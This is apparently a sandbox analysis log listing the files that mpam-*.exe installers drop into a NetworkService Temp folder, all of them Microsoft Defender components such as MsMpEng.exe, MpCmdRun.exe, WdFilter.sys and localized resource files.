Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pl-PL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\el-GR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ta-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nb-NO\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pl-PL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fil-PH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\th-TH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lt-LT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\lb-LU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\kk-KZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ru-RU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\he-IL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\mr-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-TW\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ja-JP\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\az-Latn-AZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\fi-FI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sv-SE\MpAsDesc.dll.mui Jump to dropped file
